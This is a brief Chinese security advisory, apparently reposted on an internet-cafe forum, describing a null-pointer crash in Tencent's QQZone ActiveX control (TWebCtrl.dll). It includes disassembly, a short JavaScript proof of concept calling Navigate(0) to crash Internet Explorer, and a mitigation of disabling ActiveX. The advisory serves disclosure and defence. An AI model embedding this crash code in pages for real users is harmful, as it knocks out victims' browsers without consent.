幻影旅团的axis发现了一个QQZone的activex漏洞.在使用WebCtrl.
　　方法时,将引用一个空指针,造成ie崩溃.由于该activex没有标记为safe,故会出现安全提示.
　　
　　细节:
　　
　　在TencentQQQZoneTWebCtrl.dll中,使用Navigate方法时,将造成一个空指针引用
　　
　　051024C0 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
　　051024C4 8B5424 08 MOV EDX,DWORD PTR SS:[ESP+8]
　　051024C8 6A 00 PUSH 0
　　051024CA 6A 00 PUSH 0
　　051024CC 8B80 B8000000 MOV EAX,DWORD PTR DS:[EAX+B8]
　　051024D2 6A 00 PUSH 0
　　051024D4 6A 00 PUSH 0
　　051024D6 52 PUSH EDX
　　051024D7 8B08 MOV ECX,DWORD PTR DS:[EAX]
　　
　　此时EAX为null
　　
　　幻影旅团将对此发布一个POC代码,请勿将此作为非法用途
　　
　　POC:
　　>
　　var qqkcuf = new ActiveXObject("WebCtrl.TWebControl.1");
　　var arg1 = 0;
　　
　　qqkcuf.Navigate(arg1);
　　
　　建议:
　　
　　禁止ie执行activex
　　
　　厂商补丁:
　　目前厂商没有发布补丁

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛https://bbs.txwb.com

关注天下网吧微信,了解网吧网咖经营管理，安装维护: